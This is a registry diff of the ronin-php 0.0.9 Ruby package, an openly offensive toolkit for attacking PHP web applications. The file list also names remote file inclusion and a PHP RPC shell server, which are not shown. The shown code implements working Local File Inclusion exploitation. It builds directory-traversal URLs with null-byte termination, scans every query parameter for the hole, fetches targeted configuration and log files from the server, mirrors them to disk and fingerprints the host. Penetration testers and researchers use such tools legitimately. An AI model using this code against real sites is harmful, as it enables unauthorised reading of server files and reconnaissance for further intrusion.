ronin-php 0.0.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- data/COPYING.txt +339 -0
- data/History.txt +10 -0
- data/Manifest.txt +36 -0
- data/README.txt +70 -0
- data/Rakefile +19 -0
- data/lib/ronin/php.rb +27 -0
- data/lib/ronin/php/extensions.rb +24 -0
- data/lib/ronin/php/extensions/string.rb +42 -0
- data/lib/ronin/php/lfi.rb +28 -0
- data/lib/ronin/php/lfi/exceptions.rb +24 -0
- data/lib/ronin/php/lfi/exceptions/unknown_target.rb +31 -0
- data/lib/ronin/php/lfi/extensions.rb +24 -0
- data/lib/ronin/php/lfi/extensions/uri.rb +24 -0
- data/lib/ronin/php/lfi/extensions/uri/http.rb +58 -0
- data/lib/ronin/php/lfi/file.rb +86 -0
- data/lib/ronin/php/lfi/lfi.rb +245 -0
- data/lib/ronin/php/lfi/target.rb +344 -0
- data/lib/ronin/php/rfi.rb +25 -0
- data/lib/ronin/php/rfi/extensions.rb +24 -0
- data/lib/ronin/php/rfi/extensions/uri.rb +24 -0
- data/lib/ronin/php/rfi/extensions/uri/http.rb +54 -0
- data/lib/ronin/php/rfi/rfi.rb +127 -0
- data/lib/ronin/rpc/php.rb +28 -0
- data/lib/ronin/rpc/php/call.rb +45 -0
- data/lib/ronin/rpc/php/client.rb +152 -0
- data/lib/ronin/rpc/php/console.rb +42 -0
- data/lib/ronin/rpc/php/response.rb +63 -0
- data/lib/ronin/rpc/php/rfi.rb +46 -0
- data/lib/ronin/rpc/php/shell.rb +70 -0
- data/spec/spec_helper.rb +5 -0
- data/static/rfi/test.php +27 -0
- data/static/rpc/server.php +482 -0
- data/tasks/helpers.rb +1 -0
- data/tasks/helpers/minify.rb +54 -0
- data/tasks/spec.rb +7 -0
- data/tasks/static.rb +34 -0
- metadata +132 -0
data/Rakefile
ADDED
@@ -0,0 +1,19 @@
|
|
1
|
+
# -*- ruby -*-
|
2
|
+
|
3
|
+
require 'rubygems'
|
4
|
+
require 'hoe'
|
5
|
+
require './tasks/spec.rb'
|
6
|
+
require './tasks/static.rb'
|
7
|
+
require './lib/ronin/php/version.rb'
|
8
|
+
|
9
|
+
Hoe.new('ronin-php', Ronin::PHP::VERSION) do |p|
|
10
|
+
p.rubyforge_name = 'ronin'
|
11
|
+
p.developer('Postmodern Modulus III','postmodern.mod3@gmail.com')
|
12
|
+
p.extra_deps = [
|
13
|
+
['ronin', '>=0.0.9'],
|
14
|
+
'cssmin',
|
15
|
+
'jsmin'
|
16
|
+
]
|
17
|
+
end
|
18
|
+
|
19
|
+
# vim: syntax=Ruby
|
data/lib/ronin/php.rb
ADDED
@@ -0,0 +1,27 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/php/extensions'
|
25
|
+
require 'ronin/php/lfi'
|
26
|
+
require 'ronin/php/rfi'
|
27
|
+
require 'ronin/rpc/php'
|
@@ -0,0 +1,24 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/php/extensions/string'
|
@@ -0,0 +1,42 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
class String
|
25
|
+
|
26
|
+
#
|
27
|
+
# Returns +true+ if the String contains a PHP Warning message, returns
|
28
|
+
# +false+ otherwise.
|
29
|
+
#
|
30
|
+
def php_warning?
|
31
|
+
!((self =~ /<b>Warning<\/b>:\s+/).nil?)
|
32
|
+
end
|
33
|
+
|
34
|
+
#
|
35
|
+
# Returns +true+ if the String contains a PHP Error message, returns
|
36
|
+
# +false+ otherwise.
|
37
|
+
#
|
38
|
+
def php_error?
|
39
|
+
!((self =~ /<b>Fatal error<\/b>:\s+/).nil?)
|
40
|
+
end
|
41
|
+
|
42
|
+
end
|
@@ -0,0 +1,28 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/php/lfi/exceptions'
|
25
|
+
require 'ronin/php/lfi/extensions'
|
26
|
+
require 'ronin/php/lfi/target'
|
27
|
+
require 'ronin/php/lfi/file'
|
28
|
+
require 'ronin/php/lfi/lfi'
|
@@ -0,0 +1,24 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/php/lfi/exceptions/unknown_target'
|
@@ -0,0 +1,31 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
module Ronin
|
25
|
+
module PHP
|
26
|
+
class LFI
|
27
|
+
class UnknownTarget < RuntimeError
|
28
|
+
end
|
29
|
+
end
|
30
|
+
end
|
31
|
+
end
|
@@ -0,0 +1,24 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/php/lfi/extensions/uri'
|
@@ -0,0 +1,24 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/php/lfi/extensions/uri/http'
|
@@ -0,0 +1,58 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/php/lfi/lfi'
|
25
|
+
|
26
|
+
module URI
|
27
|
+
class HTTP < Generic
|
28
|
+
|
29
|
+
def test_lfi(options={})
|
30
|
+
up = ((options[:up]) || 0..Ronin::PHP::LFI::MAX_UP)
|
31
|
+
vulns = []
|
32
|
+
|
33
|
+
query_params.each_key do |param|
|
34
|
+
lfi = Ronin::PHP::LFI.new(self,param)
|
35
|
+
|
36
|
+
up.each do |n|
|
37
|
+
lfi.up = n
|
38
|
+
|
39
|
+
if lfi.vulnerable?(options)
|
40
|
+
vulns << lfi
|
41
|
+
break
|
42
|
+
end
|
43
|
+
end
|
44
|
+
end
|
45
|
+
|
46
|
+
return vulns
|
47
|
+
end
|
48
|
+
|
49
|
+
def lfi(options={})
|
50
|
+
test_lfi(options).first
|
51
|
+
end
|
52
|
+
|
53
|
+
def has_lfi?(options={})
|
54
|
+
!(test_lfi(options).empty?)
|
55
|
+
end
|
56
|
+
|
57
|
+
end
|
58
|
+
end
|
@@ -0,0 +1,86 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
module Ronin
|
25
|
+
module PHP
|
26
|
+
class LFI
|
27
|
+
class File < StringIO
|
28
|
+
|
29
|
+
# Path to the file
|
30
|
+
attr_reader :path
|
31
|
+
|
32
|
+
#
|
33
|
+
# Creates a new Inclusion with the specified _path_ and response
|
34
|
+
# _body_.
|
35
|
+
#
|
36
|
+
def initialize(path,body)
|
37
|
+
super(body)
|
38
|
+
|
39
|
+
@path = path
|
40
|
+
end
|
41
|
+
|
42
|
+
#
|
43
|
+
# Returns the contents of the File in String form.
|
44
|
+
#
|
45
|
+
def contents
|
46
|
+
string
|
47
|
+
end
|
48
|
+
|
49
|
+
#
|
50
|
+
# See contents.
|
51
|
+
#
|
52
|
+
def to_s
|
53
|
+
contents
|
54
|
+
end
|
55
|
+
|
56
|
+
def inspect
|
57
|
+
"#<#{self.class}:#{@path}>"
|
58
|
+
end
|
59
|
+
|
60
|
+
#
|
61
|
+
# Saves the body to specified _destination_, returns the
|
62
|
+
# _destination_.
|
63
|
+
#
|
64
|
+
def save(destination)
|
65
|
+
File.open(destination,'w') do |dest|
|
66
|
+
dest.write(string)
|
67
|
+
end
|
68
|
+
|
69
|
+
return destination
|
70
|
+
end
|
71
|
+
|
72
|
+
def mirror(base)
|
73
|
+
dest = File.join(base,@path)
|
74
|
+
dest_dir = File.dirname(dest)
|
75
|
+
|
76
|
+
unless File.directory?(dest_dir)
|
77
|
+
FileUtils.mkdir_p(dest_dir)
|
78
|
+
end
|
79
|
+
|
80
|
+
return save(dest)
|
81
|
+
end
|
82
|
+
|
83
|
+
end
|
84
|
+
end
|
85
|
+
end
|
86
|
+
end
|
@@ -0,0 +1,245 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/php/lfi/exceptions/unknown_target'
|
25
|
+
require 'ronin/php/lfi/target'
|
26
|
+
require 'ronin/php/lfi/file'
|
27
|
+
require 'ronin/extensions/uri'
|
28
|
+
require 'ronin/network/http'
|
29
|
+
require 'ronin/path'
|
30
|
+
|
31
|
+
module Ronin
|
32
|
+
module PHP
|
33
|
+
class LFI
|
34
|
+
|
35
|
+
# Maximum number of directories to escape
|
36
|
+
MAX_UP = 15
|
37
|
+
|
38
|
+
# The URL which is vulnerable
|
39
|
+
attr_reader :url
|
40
|
+
|
41
|
+
# The vulnerable query param
|
42
|
+
attr_accessor :param
|
43
|
+
|
44
|
+
# The path prefix
|
45
|
+
attr_accessor :prefix
|
46
|
+
|
47
|
+
# Number of directories to traverse up
|
48
|
+
attr_accessor :up
|
49
|
+
|
50
|
+
# Whether to terminate the LFI path with a null byte
|
51
|
+
attr_accessor :terminate
|
52
|
+
|
53
|
+
# Targeted Operating System (OS)
|
54
|
+
attr_accessor :os
|
55
|
+
|
56
|
+
#
|
57
|
+
# Creates a new LFI object with the specified _url_, _param_ and the
|
58
|
+
# given _options_. The specified _param_ indicates which query param
|
59
|
+
# in the _url_ is vulnerable to Local File Inclusion.
|
60
|
+
#
|
61
|
+
# _options_ may contain the following keys:
|
62
|
+
# <tt>:prefix</tt>:: The path prefix.
|
63
|
+
# <tt>:up</tt>:: The number of directories to transverse up. Defaults
|
64
|
+
# to 0.
|
65
|
+
# <tt>:terminate</tt>:: Whether or not to terminate the LFI path with
|
66
|
+
# a null byte. Defaults to +true+.
|
67
|
+
# <tt>:os</tt>:: The Operating System to target.
|
68
|
+
#
|
69
|
+
def initialize(url,param,options={})
|
70
|
+
@url = url
|
71
|
+
@param = param
|
72
|
+
|
73
|
+
@prefix = options[:prefix]
|
74
|
+
@up = (options[:up] || 0)
|
75
|
+
|
76
|
+
if options.has_key?(:terminate)
|
77
|
+
@terminate = options[:terminate]
|
78
|
+
else
|
79
|
+
@terminate = true
|
80
|
+
end
|
81
|
+
|
82
|
+
@os = options[:os]
|
83
|
+
end
|
84
|
+
|
85
|
+
#
|
86
|
+
# Returns +true+ if the LFI path will be terminated with a null byte,
|
87
|
+
# returns +false+ otherwise.
|
88
|
+
#
|
89
|
+
def terminate?
|
90
|
+
@terminate == true
|
91
|
+
end
|
92
|
+
|
93
|
+
#
|
94
|
+
# Builds a LFI url to include the specified _path_.
|
95
|
+
#
|
96
|
+
def url_for(path)
|
97
|
+
escape = (@prefix || Path.up(@up))
|
98
|
+
full_path = escape.join(path.to_s)
|
99
|
+
full_path = "#{full_path}\0" if terminate?
|
100
|
+
|
101
|
+
new_url = URI(@url.to_s)
|
102
|
+
new_url.query_params[@param.to_s] = full_path
|
103
|
+
|
104
|
+
return new_url
|
105
|
+
end
|
106
|
+
|
107
|
+
#
|
108
|
+
# Get the specified _path_ with the given _options_.
|
109
|
+
#
|
110
|
+
def get(path,options={})
|
111
|
+
options = options.merge(:url => url_for(path))
|
112
|
+
|
113
|
+
if options[:method] == :post
|
114
|
+
return Net.http_post_body(options)
|
115
|
+
else
|
116
|
+
return Net.http_get_body(options)
|
117
|
+
end
|
118
|
+
end
|
119
|
+
|
120
|
+
#
|
121
|
+
# Include the specified _path_ with the given _options_. Returns a
|
122
|
+
# new File object for the included _path_.
|
123
|
+
#
|
124
|
+
def include(path,options={})
|
125
|
+
File.new(path,get(path,options))
|
126
|
+
end
|
127
|
+
|
128
|
+
#
|
129
|
+
# Include a targeted file specified by _name_ using the given
|
130
|
+
# _options_. Returns a new File object for the included file.
|
131
|
+
# If a _block_ is given, it will be passed the newly created File
|
132
|
+
# object.
|
133
|
+
#
|
134
|
+
def include_target(name,options={},&block)
|
135
|
+
name = name.to_s
|
136
|
+
target = Target.with_file(name)
|
137
|
+
|
138
|
+
unless target
|
139
|
+
raise(UnknownTarget,"unknown target file #{name.dump}",caller)
|
140
|
+
end
|
141
|
+
|
142
|
+
return inclusion_of(target,options,&block)
|
143
|
+
end
|
144
|
+
|
145
|
+
def save_target(name,dest,options={})
|
146
|
+
include_target(name,options) do |file|
|
147
|
+
file.save(dest)
|
148
|
+
end
|
149
|
+
end
|
150
|
+
|
151
|
+
#
|
152
|
+
# Includes all targeted config and log files with the given _options_.
|
153
|
+
#
|
154
|
+
def include_targets(options={},&block)
|
155
|
+
(Target.configs + Target.logs).map { |target|
|
156
|
+
include_of(target,options,&block)
|
157
|
+
}.compact
|
158
|
+
end
|
159
|
+
|
160
|
+
#
|
161
|
+
# Mirrors all targeted config and log files to the specifed
|
162
|
+
# _directory_ using the given _options_.
|
163
|
+
#
|
164
|
+
def mirror_targets(directory,options={})
|
165
|
+
include_targets(options).map do |file|
|
166
|
+
file.mirror(directory)
|
167
|
+
end
|
168
|
+
end
|
169
|
+
|
170
|
+
#
|
171
|
+
# Returns +true+ if the url is vulnerable to LFI, returns +false+
|
172
|
+
# otherwise.
|
173
|
+
#
|
174
|
+
def vulnerable?(options={})
|
175
|
+
Target.tests.each do |target|
|
176
|
+
inclusion_of(target) do |file|
|
177
|
+
return true
|
178
|
+
end
|
179
|
+
end
|
180
|
+
|
181
|
+
return false
|
182
|
+
end
|
183
|
+
|
184
|
+
#
|
185
|
+
# Extracts information from all targeted files using the given
|
186
|
+
# _options_.
|
187
|
+
#
|
188
|
+
# _options_ may include the following options:
|
189
|
+
# <tt>:oses</tt>:: The Array of OSes to test for.
|
190
|
+
#
|
191
|
+
def fingerprint(options={})
|
192
|
+
data = {}
|
193
|
+
|
194
|
+
Target.with_extractors.each do |target|
|
195
|
+
inclusion_of(target,options) do |file|
|
196
|
+
data.merge!(target.extract_from(file.contents))
|
197
|
+
end
|
198
|
+
end
|
199
|
+
|
200
|
+
return data
|
201
|
+
end
|
202
|
+
|
203
|
+
#
|
204
|
+
# Returns the String form of the url.
|
205
|
+
#
|
206
|
+
def to_s
|
207
|
+
@url.to_s
|
208
|
+
end
|
209
|
+
|
210
|
+
protected
|
211
|
+
|
212
|
+
#
|
213
|
+
# Returns the available paths of the specified _target_.
|
214
|
+
#
|
215
|
+
def paths_of(target)
|
216
|
+
if @os
|
217
|
+
return target.paths_for(@os)
|
218
|
+
else
|
219
|
+
return target.all_paths
|
220
|
+
end
|
221
|
+
end
|
222
|
+
|
223
|
+
#
|
224
|
+
# Returns the File object obtained via the specified _target_
|
225
|
+
# and the given _options_. If a _block_ is given, it will be passed
|
226
|
+
# the new File object.
|
227
|
+
#
|
228
|
+
def inclusion_of(target,options={},&block)
|
229
|
+
paths_of(target).each do |path|
|
230
|
+
body = get(path,options)
|
231
|
+
|
232
|
+
if target.included_in?(body)
|
233
|
+
file = File.new(path,body)
|
234
|
+
|
235
|
+
block.call(file) if block
|
236
|
+
return file
|
237
|
+
end
|
238
|
+
end
|
239
|
+
|
240
|
+
return nil
|
241
|
+
end
|
242
|
+
|
243
|
+
end
|
244
|
+
end
|
245
|
+
end
|